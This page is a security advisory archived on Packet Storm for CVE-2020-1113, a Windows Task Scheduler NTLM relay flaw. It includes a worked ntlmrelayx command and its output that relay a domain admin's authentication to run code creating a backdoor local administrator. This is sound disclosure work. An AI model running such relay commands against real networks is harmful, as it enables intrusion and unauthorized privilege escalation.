what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows Task Scheduler Security Feature Bypass

Microsoft Windows Task Scheduler Security Feature Bypass
Posted May 15, 2020
Authored by Sylvain Heiniger

Compass Security identified a security feature bypass vulnerability in Microsoft Windows. Due to the absence of integrity verification requirements for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle attacker can relay his victim's NTLM authentication to a target of his choice over the RPC protocol. Provided the victim has administrative privileges on the target, the attacker can execute code on the remote target.

tags | exploit, remote, protocol, bypass
systems | windows
advisories | CVE-2020-1113
SHA-256 | 16fcf81541831c6f1a2109c00a1d366d79871db6b8aecafaba474512db27d1b8

Microsoft Windows Task Scheduler Security Feature Bypass

Change Mirror Download
################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: Windows Task Scheduler
# Vendor: Microsoft
# CSNC ID: CSNC-2010-001
# CVE ID: CVE-2020-1113
# Subject: Security Feature Bypass
# Risk: High
# Effect: Remotely exploitable
# Authors: Sylvain Heiniger <sylvain.heiniger@compass-security.com>
# Date: 14.05.2020
#
################################################################################

Introduction:
-------------
NTLM relay attacks are well-known for privilege escalation in Windows networks.

Compass Security identified a security feature bypass vulnerability in
Microsoft Windows. Due to the absence of integrity verification requirements
for the RPC protocol and in particular the Task Scheduler, a man-in-the-middle
attacker can relay his victim's NTLM authentication to a target of his choice
over the RPC protocol. Provided the victim has administrative privileges on
the target, the attacker can execute code on the remote target.

Affected:
---------
Vulnerable:
* Windows 7
* Windows 8.1
* Windows 10
* Windows Server 2008
* Windows Server 2008 R2
* Windows Server 2012
* Windows Server 2016
* Windows Server 2019

For details about the affected versions and the relevant update, please refer
to Microsoft's website [1].

Technical Description:
----------------------
To the best of our knowledge, there is currently no way to require signing on
RPC connections hence relay attacks can be performed over RPC. A hardened
system where a classical SMB relay attack would fail is still vulnerable to an
attacker who can relay HTTP, SMB or RPC connections to RPC.

MS-TSCH is the protocol to manage scheduled tasks. The protocol does not
specify any requirement for the server in terms of checking integrity of
received data.

Our modified version of impacket [2] includes a new RPCRelayServer and
RPCRelayClient as well as an RPCAttack (based on ATExec). In our setup, the
attacker machine has the IP 172.16.100.21 while the victim machine DC is a
Windows Server 2016 with the IP 172.16.100.1.

We run the ntmlrelayx tool with arguments -t and -c to specify your target and
command
# ntlmrelayx.py -ip 0.0.0.0 -t rpc://172.16.100.1 -c "net user compass
StrongPass.123 /add && net localgroup Administrators compass /add"
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Running in relay mode to single host
[*] Setting up RPC Server
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
...

Trigger a connection to the attacker machine. In this case the user
WINLAB\scooper-da, who is in the local Administrators group of the DC machine,
makes an SMB connection from the machine with IP 172.16.100.14 to the attacker
machine on IP 172.16.100.21.
# net view \\172.16.100.21\noshare\

The tool picks up the connection and relays it:
...
[*] SMBD-Thread-4: Received connection from 172.16.100.14, attacking
target rpc://172.16.100.1
[*] Authenticating against rpc://172.16.100.1 as WINLAB\scooper-da SUCCEED
[*] Trying to execute specified command (net user compass StrongPass.123
/add && net localgroup Administrators compass /add)
[*] Creating task \WeumPsdH
[*] Running task \WeumPsdH
[*] Deleting task \WeumPsdH

As a result, the given command is executed (through a scheduled task) and a
new local administrator is created.

Workaround / Fix:
-----------------
* Patch your Windows.
* Enforce packet signing for clients and servers via GPO.
* Check you Active Directory ACLs: Least privilege principle should be used.
* Network segmentation can help prevent relaying attacks.

Timeline:
---------
2020-01-27: Discovery by Sylvain Heiniger
2020-01-29: Initial vendor notification
2020-01-29: Initial vendor response
2020-02-13: Vendor acknowledgement
2020-04-16: CVE-2020-1113 assigned
2020-05-12: Release of fixed version as part of Patch Tuesday [1]
2020-05-14: Public disclosure
2020-06-14: Proof-of-concept code disclosure [3]

References:
-----------
[1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1113
[2] https://github.com/SecureAuthCorp/impacket
[3] https://github.com/CompassSecurity/impacket


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close